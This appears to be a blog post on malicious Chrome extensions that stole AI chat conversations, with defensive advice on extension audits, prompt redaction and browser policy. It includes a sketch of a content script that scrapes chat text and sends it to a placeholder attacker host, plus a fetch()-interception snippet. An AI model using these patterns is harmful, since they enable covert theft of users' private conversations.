
Malicious Chrome Extensions Steal AI Chats: How to Protect Your Conversations in 2026

Roughly 900,000 users installed fake Chrome extensions that silently stole their private AI conversations while posing as normal AI assistant tools. If you depend on AI for work, research, or coding, this is not just a tech story: it is a direct security and privacy issue.

AI chat security is now a core part of AI productivity tools, especially for professionals in Canada and worldwide who use platforms like ChatGPT, DeepSeek, and Perplexity every day. This guide explains what happened, why it matters, and how to build safer AI workflows using usebetterai.com-style practices.


What Happened in the 900K AI Chat Theft Campaign?

Two malicious Chrome extensions pretended to be legitimate AI assistant tools and quietly stole users’ AI conversations and browsing data. They targeted popular AI platforms, including ChatGPT and DeepSeek, and even appeared trustworthy inside the Chrome Web Store.

  • The campaign was discovered by OX Security’s research team in late 2025.

  • The fake extensions mimicked AITOPIA, a real AI sidebar extension, copying its interface and behavior.

  • Once installed, they scraped AI chats directly from the browser and sent the data to attacker-controlled servers every 30 minutes.

The Featured Extension Problem

One of the malicious extensions carried Google’s “Featured” badge, which usually signals that an extension follows security and UX best practices. This made it look especially safe to non-technical users.

  • The two identified rogue extensions together had roughly 900,000 downloads.

  • OX Security reported them to Google on December 29, 2025, but they remained available at least through December 30.

This shows that even “Featured” or “Recommended” browser extensions cannot be assumed safe when handling sensitive AI content.


How These Malicious AI Extensions Actually Work

To protect yourself, it helps to understand how these extensions steal data under the hood. The techniques used in this campaign are becoming common in AI-related malware.

Step-by-Step: From Install to Exfiltration

Once a user installs one of these malicious extensions, a predictable chain of events follows (a simplified, defanged sketch appears after this list).

  1. Unique tracking ID created

    • The extension assigns a unique user ID and starts tracking your browsing sessions.

  2. Monitoring your tabs and URLs

    • Using Chrome’s tabs APIs, the extension watches when you open ChatGPT, DeepSeek, or other AI tools.

    • It also collects active tab URLs, exposing your research topics, internal tools, and sometimes query parameters.

  3. Scraping AI conversations from the DOM

    • When you are on an AI chat page, the extension reads the Document Object Model (DOM) and pulls both your prompts and the AI responses.

    • This can include confidential project details, source code, clinical notes, or internal company plans.

  4. Encoding and sending the data out

    • The stolen data is encoded in Base64 and sent to command-and-control servers such as deepaichats[.]com and chatsaigpt[.]com.

    • Uploads are batched and sent roughly every 30 minutes to hide in normal traffic patterns.

  5. Silent updates keep the attack alive

    • Extensions can receive automatic updates that add or change malicious behavior without any user approval.

    • This “sleeper agent” pattern lets a seemingly harmless extension turn dangerous months later.
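To make the pattern concrete, here is a heavily simplified, defanged sketch of what a content script following steps 1, 3, and 4 might look like (step 2, tab and URL monitoring, would live in the extension's background script via the chrome.tabs API). The selector, endpoint, interval, and all names are illustrative placeholders, not the actual malware's code.

```typescript
// content-script.ts — defanged sketch of the exfiltration pattern described above.
// The endpoint, selector, and interval are illustrative placeholders.

const EXFIL_ENDPOINT = "https://attacker-controlled.example/collect"; // placeholder C2
const UPLOAD_INTERVAL_MS = 30 * 60 * 1000; // ~30 minutes, to blend into normal traffic

// Step 1: assign a persistent per-victim tracking ID.
const trackingId = localStorage.getItem("uid") ?? crypto.randomUUID();
localStorage.setItem("uid", trackingId);

const batch: string[] = [];

// Step 3: scrape prompts and responses straight out of the chat page's DOM.
// ".message" stands in for whatever selector matches the AI transcript;
// a real implementation would also deduplicate messages.
function scrapeChat(): void {
  document.querySelectorAll(".message").forEach((el) => {
    const text = el.textContent?.trim();
    if (text) batch.push(text);
  });
}

// Step 4: Base64-encode and ship the batch on a timer.
setInterval(() => {
  scrapeChat();
  if (batch.length === 0) return;
  // Classic Unicode-safe Base64 trick; modern code might use TextEncoder instead.
  const payload = btoa(unescape(encodeURIComponent(JSON.stringify({ trackingId, batch }))));
  fetch(EXFIL_ENDPOINT, { method: "POST", body: payload }).catch(() => {});
  batch.length = 0;
}, UPLOAD_INTERVAL_MS);
```

Notice that nothing here exploits the AI platform itself: ordinary content-script access to the chat domain is enough to read everything on the page.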

Why AI Conversations Are a Goldmine

For attackers, AI chats are rich, structured data. They can include:

  • Product roadmaps, business strategies, or customer data.

  • Source code and internal architecture details from developers.

  • Clinical summaries or protocol-related notes from research staff (even if de-identified).

The value of these chats makes them a prime target in 2026’s AI cybersecurity landscape.


A Wider Pattern: “Privacy” and “Productivity” Extensions Logging AI Chats

The 900,000-user campaign is part of a wider pattern: browser extensions marketed as “privacy tools” or “productivity tools” quietly logging AI conversations at scale.

The Free VPN and “Privacy” Extension Problem

In December 2025, Koi Security revealed that several free VPN and privacy-related Chrome and Edge extensions with more than 8 million downloads were capturing AI conversations.

  • Extensions like Urban VPN Proxy and related tools intercepted conversations from ChatGPT, Claude, Gemini, Copilot, Perplexity, DeepSeek, Grok, and other AI platforms.

  • JavaScript code embedded in these extensions overrode core browser functions like fetch() and XMLHttpRequest, allowing real-time interception of user inputs and AI responses (a minimal sketch follows this list).

  • Some of these were also labeled as “Featured” on the browser extension stores.
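To make the fetch() override concrete, here is a minimal, defanged sketch of the wrap-and-forward technique. It logs to the console instead of exfiltrating, and the hostname check is illustrative.

```typescript
// Sketch of a fetch() override: a page-injected script wraps the native fetch
// so every request and response to an AI backend passes through attacker code first.

const originalFetch = window.fetch;

window.fetch = async function (input: RequestInfo | URL, init?: RequestInit): Promise<Response> {
  const url =
    typeof input === "string" ? input : input instanceof URL ? input.href : input.url;

  // Only siphon traffic headed to AI chat backends (hostname check is illustrative).
  if (/chatgpt|claude|gemini|perplexity|deepseek/i.test(url)) {
    console.debug("intercepted request:", url, init?.body); // the user's prompt

    const response = await originalFetch(input, init);
    // Clone the response so the page still receives it unmodified
    // while a copy of the AI's answer is read on the side.
    response.clone().text().then((body) => console.debug("intercepted response:", body));
    return response;
  }

  return originalFetch(input, init);
};
```

The same trick applies to XMLHttpRequest by wrapping its prototype's open and send methods, which is why both functions were overridden in the reported extensions.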

Users often installed these extensions to increase privacy, but instead their AI conversations were monetized and logged without clear consent.

Enterprise Extension Risk: 99% Usage, 53% High-Risk Permissions

An enterprise browser extension security report in 2025 found:

  • 99% of enterprise users have at least one browser extension installed.

  • Over half run more than 10 extensions at the same time.

  • 53% of users have at least one extension with “high” or “critical” permission scopes, able to access cookies, passwords, browsing data, and full page contents.

For organizations that embrace AI-powered productivity—from clinical research sites to software teams—this means nearly every employee represents a potential attack vector via browser extensions.


Why This Matters for Professionals Using AI Every Day

If you are a web developer, clinical researcher, or knowledge worker using AI as a core tool, these attacks are not abstract. They directly affect your work, compliance obligations, and, in some cases, patient or client confidentiality.

High-Risk Use Cases

You are especially at risk if you:

  • Paste internal code, credentials, or infrastructure details into ChatGPT, DeepSeek, or Perplexity.

  • Summarize internal SOPs, study protocols, or regulatory documents inside AI tools.

  • Use AI to draft agreements, HR decisions, or sensitive corporate communications.

When malicious extensions scrape AI conversations, they gain:

  • Internal naming conventions, URLs, and system structures.

  • Business strategy and research plans.

  • Potentially identifiable fragments that, when combined, may violate contracts or regulations.

As AI becomes a core productivity layer in 2026, attackers are following the data.


Practical AI Security Workflow: How to Use AI Safely in 2026

Rather than simply recapping the news, this section focuses on actionable workflows you can adopt to keep enjoying AI productivity tools without exposing your organization.

Step 1: Lock Down Your Browser Extensions

Start by treating extensions as untrusted code that runs in your browser.

1. Audit all installed extensions (monthly)

  • Go to chrome://extensions (or your browser’s equivalent).

  • For each extension, ask:

    • Do you still actively use it?

    • Is it from a well-known, accountable publisher?

    • Does it really need access to “All sites” or “Read and change data on every website you visit”?

Remove anything you do not recognize or genuinely need.
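If you want to go beyond eyeballing the list, a short script can flag extensions that request broad permission scopes. This is a minimal sketch assuming the default macOS Chrome profile path; the path, the risk list, and the runner (npx tsx) are assumptions to adapt to your own setup.

```typescript
// audit-extensions.ts — flag locally installed Chrome extensions with broad permissions.
// Run with: npx tsx audit-extensions.ts
// Path below is the macOS default profile; adjust for Windows or Linux.

import { readdirSync, readFileSync, existsSync } from "node:fs";
import { join } from "node:path";
import { homedir } from "node:os";

const EXTENSIONS_DIR = join(
  homedir(),
  "Library/Application Support/Google/Chrome/Default/Extensions",
);

// Permission scopes broad enough to read AI chats on any page.
const HIGH_RISK = new Set(["<all_urls>", "tabs", "webRequest", "cookies", "history"]);

for (const entry of readdirSync(EXTENSIONS_DIR, { withFileTypes: true })) {
  if (!entry.isDirectory()) continue;
  const extDir = join(EXTENSIONS_DIR, entry.name);
  for (const version of readdirSync(extDir)) {
    const manifestPath = join(extDir, version, "manifest.json");
    if (!existsSync(manifestPath)) continue;
    const manifest = JSON.parse(readFileSync(manifestPath, "utf8"));
    const perms: string[] = [
      ...(manifest.permissions ?? []),
      ...(manifest.host_permissions ?? []),
    ];
    const risky = perms.filter((p) => HIGH_RISK.has(p) || p.includes("://*"));
    if (risky.length > 0) {
      // Names may show up as __MSG_...__ i18n keys; the folder name is the extension ID.
      console.log(`${manifest.name ?? entry.name}: ${risky.join(", ")}`);
    }
  }
}
```

Anything this prints deserves the three questions above before it stays installed.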

2. Adopt a “zero-extension” baseline for AI work

  • Use a separate browser profile (or a separate browser) reserved only for:

    • ChatGPT

    • DeepSeek

    • Perplexity

    • Other AI tools

  • In that profile, keep extensions to the absolute minimum (ideally none except a password manager).

This simple separation dramatically reduces the chance that a malicious extension can see your AI conversations.

Step 2: Segment Sensitive and Non-Sensitive AI Use

Design your AI productivity workflow so that the most sensitive information never touches general-purpose AI chats.

Create three buckets for your prompts:

  1. Public or low-risk

    • Generic marketing copy, public documentation, or learning questions.

    • Safe to use in normal AI tools.

  2. Internal but non-regulated

    • Internal process notes, pseudonymized analytics, architecture ideas.

    • Use only from a hardened browser profile with no risky extensions.

  3. Regulated or highly confidential

    • Patient-related clinical information, confidential contracts, strategic M&A plans.

    • Only use in environments with enterprise-grade AI governance or on-prem solutions; avoid consumer browser-chat flows entirely.

Mapping your prompts into these buckets becomes a simple checklist habit and greatly reduces exposure if an extension is compromised.
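The bucket check can even be automated as a pre-flight step before a prompt reaches a consumer AI tool. Below is a minimal sketch; every pattern and bucket name is an illustrative assumption to replace with your own policies, not a complete DLP ruleset.

```typescript
// prompt-gate.ts — sketch of a pre-flight classifier for the three prompt buckets.
// All patterns are illustrative placeholders, not an exhaustive ruleset.

type Bucket = "public" | "internal" | "restricted";

const RESTRICTED_PATTERNS: RegExp[] = [
  /\bAKIA[0-9A-Z]{16}\b/, // AWS access key ID shape
  /-----BEGIN (RSA |EC )?PRIVATE KEY-----/, // pasted private keys
  /\bpatient\b|\bMRN\b|\bdate of birth\b/i, // clinical identifiers
];

const INTERNAL_PATTERNS: RegExp[] = [
  /https?:\/\/[\w.-]*\.internal\b/i, // internal hostnames (adjust to your org)
  /\bconfidential\b|\bdo not distribute\b/i, // document markings
];

function classifyPrompt(prompt: string): Bucket {
  if (RESTRICTED_PATTERNS.some((re) => re.test(prompt))) return "restricted";
  if (INTERNAL_PATTERNS.some((re) => re.test(prompt))) return "internal";
  return "public";
}

// This prompt would be flagged before it ever reaches a consumer AI chat.
console.log(classifyPrompt("Debug this: -----BEGIN PRIVATE KEY----- ...")); // "restricted"
```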

Step 3: Build Safer AI Prompts and Workflows

Even when your browser is clean, you can make your AI prompts safer and more robust. This also improves outcomes in AI search and assistant platforms such as Perplexity Discover and other answer engines.

Safer prompt-writing habits:

  • Strip identifiers: Remove names, IDs, URLs, and client-specific details whenever the context allows.

  • Use placeholders: Write “Hospital A,” “Study X,” or “Client Y” instead of real names.

  • Avoid secrets: Never paste API keys, SSH keys, or full database connection strings.

Example (developer):

  • Unsafe: “Here’s our production .env file. Why is the app crashing?”

  • Safer: “Here is a sample .env with redacted values and the stack trace. What are common causes of this error in Laravel?”

Example (clinical researcher):

  • Unsafe: “Patient #123 with lung cancer had X mutation and Y AE. How should the oncologist respond?”

  • Safer: “A patient in a phase 2 oncology trial with an EGFR mutation developed grade 3 rash after treatment with a TKI. What are guideline-backed management options for these AEs?”

These workflows keep AI productivity high while limiting damage if browser data is ever leaked.
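If you redact often, a small helper makes the habit mechanical. This sketch applies the placeholder approach above; each pattern and replacement is an illustrative assumption to tune to your own identifiers.

```typescript
// redact.ts — sketch of the "strip identifiers, use placeholders" habit as code.
// Patterns and replacements are illustrative; tune them to your own data.

const REDACTIONS: Array<[RegExp, string]> = [
  [/[\w.+-]+@[\w-]+\.[\w.]+/g, "[EMAIL]"], // email addresses
  [/\b(?:\d{1,3}\.){3}\d{1,3}\b/g, "[IP_ADDRESS]"], // IPv4 addresses
  [/\b(?:sk|pk|api)[-_][A-Za-z0-9]{16,}\b/g, "[API_KEY]"], // common key prefixes
  [/\bAcme Corp\b/g, "Client Y"], // map known client names to placeholders
];

export function redact(prompt: string): string {
  return REDACTIONS.reduce(
    (text, [pattern, placeholder]) => text.replace(pattern, placeholder),
    prompt,
  );
}

console.log(redact("Email jane@acme.com from 10.0.0.12 used key sk-abcdefghijklmnop1234"));
// -> "Email [EMAIL] from [IP_ADDRESS] used key [API_KEY]"
```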


2026 Predictions: The Next Wave of AI + Browser Threats

Beyond what has already happened, several trends are likely to shape AI security and multi-agent AI workflows in 2026.

Prediction 1: More AI-Specific Malware in Extensions

Attackers now understand that AI conversations are high-value, structured intelligence. Expect:

  • Extensions that target specific AI domains (coding assistants, medical literature summarizers, legal drafting tools).

  • Multi-platform injectors that monitor not just ChatGPT and DeepSeek, but also specialized tools embedded inside EMRs, IDEs, and SaaS dashboards.

Prediction 2: Enterprise “AI Browser” and Policy Controls

Vendors are already pushing secure enterprise browsers and AI policy layers. In 2026, more organizations will:

  • Whitelist only approved extensions (a policy file sketch follows this list).

  • Enforce AI usage policies at the browser level (e.g., blocking copy-paste of certain data types into public AI tools).

  • Log and monitor AI interactions centrally for compliance.
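The whitelisting piece is already supported by Chrome's managed policies. As a sketch, a managed policy file (on Linux, typically placed under /etc/opt/chrome/policies/managed/; Windows uses the registry equivalents) can block every extension by default and allow only vetted IDs. The extension ID below is a placeholder.

```json
{
  "ExtensionInstallBlocklist": ["*"],
  "ExtensionInstallAllowlist": ["abcdefghijklmnopabcdefghijklmnop"]
}
```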

Prediction 3: Answer-Engine SEO Meets Security

As AI-first search engines such as Perplexity Discover grow, security-conscious content will rank better. High-performing content will:

  • Blend AI productivity tips with concrete security and compliance practices.

  • Show transparent E-E-A-T signals (experience, expertise, authoritativeness, and trustworthiness).

  • Provide structured FAQs and step-by-step workflows that AI models can easily surface and reuse.

Sites like usebetterai.com can stand out by pairing AI efficiency with practical AI security frameworks—not just generic prompt lists.

FAQ: Malicious Chrome Extensions and AI Conversations

1. Can a browser extension really read my AI chats?

Yes. If an extension has permissions to “Read and change data on all websites,” it can see the contents of the pages you open, including AI conversations.

2. Does a “Featured” or “Recommended” badge mean an extension is safe?

No. In recent cases, malicious or highly invasive extensions have still carried “Featured” badges on Chrome and Edge stores. Treat badges as a signal—not a guarantee.

3. How do I know if my conversations were stolen?

In most cases, you cannot easily see what data was exfiltrated. If you installed one of the reported extensions, assume your AI chats and URLs may have been exposed and:

  • Remove the extension.

  • Rotate any credentials or secrets you pasted into chats.

  • Notify your security or compliance team if you handled sensitive data.

4. Are AI platforms like ChatGPT or DeepSeek themselves unsafe?

The recent incidents targeted the browser environment, not the AI providers’ core infrastructure. However, treating all AI chats as potentially sensitive is still wise, especially for enterprise or regulated work.

5. What is the safest way to keep using AI for work?

  • Minimize extensions in the browser you use for AI.

  • Separate high-risk and low-risk AI use cases.

  • Avoid sharing secrets or regulated data with general-purpose AI tools.

  • Use enterprise AI solutions when working with sensitive or regulated information.


Build a Safer AI Stack Before the Next Wave Hits

Attackers are now targeting AI conversations at scale, and the 900,000-user Chrome extension campaign is likely just the beginning. Instead of avoiding AI, the smarter move is to upgrade how you use it.

  • Audit your extensions this week and create a clean AI-only browser profile.

  • Redesign your prompts around de-identification and secure workflows.

  • Explore usebetterai-style tools and guides that combine AI productivity with practical security patterns tailored to your role.

The professionals and teams who master both AI speed and AI safety will move faster than competitors—without bleeding sensitive data into rogue extensions and shadow data markets.

Jordan M.

Jordan M. focuses on how AI tools fit into real workflows and daily routines. With a strong interest in usability and productivity, Jordan helps break down complex tools into simple, actionable guidance. His goal is to make AI feel accessible, efficient, and worth using for beginners and professionals alike.
